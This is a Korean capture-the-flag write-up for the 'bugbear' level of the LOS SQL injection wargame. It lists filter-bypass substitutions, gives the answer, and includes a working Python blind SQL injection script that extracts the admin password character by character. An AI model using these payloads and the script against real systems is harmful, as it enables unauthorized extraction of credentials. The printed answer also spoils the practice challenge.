LOS - bugbear / level 13

문제

풀이 과정

blind sql injection 방식을 통해 bit masking을 하여 해결한다

 

pw에 ' / substr / ascii / = / or / and /  / like / 0x를 필터링 중이므로

각각 " / mid / in / || / %26%26으로 우회한다

 

정답

?pw=52dc3991

코드

# LOS - bugbear

import requests

url = "your url"

cookie = {"PHPSESSID" : "your session"}

user = "admin"

def find_length(url, cookie, user):
    i = 1
    while True:

        params = f"?no=1%09||%09id%09in%09(%22{user}%22)%09%26%26%09length(pw)%09>%09{i}%23"
        send_url = url + params
        res = requests.get(send_url, cookies=cookie)
        print(str(res.status_code) + " " + params)
        if "Hello admin" not in res.text:
            break
        
        i += 1
    print(f"\nlength : {i}")
    return i

def blind(url, cookie, user, length):
    result_str = ""
    for i in range(1,length + 1):
        find_str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        for k in range(len(find_str)):
            params = f"?no=1%09||%09id%09in%09(%22{user}%22)%09%26%26mid(pw,{i},1)%09in%09(%22{find_str[k]}%22)%23"
            send_url = url + params

            res = requests.get(send_url, cookies=cookie)
            print(find_str[k], end=" ", flush=True)
            if "Hello admin" in res.text:
                result_str = result_str + find_str[k]
                break    
        print(f"\nresult : {result_str}")
    return result_str


length = find_length(url, cookie, user)

result = blind(url, cookie,user,length)

print(result)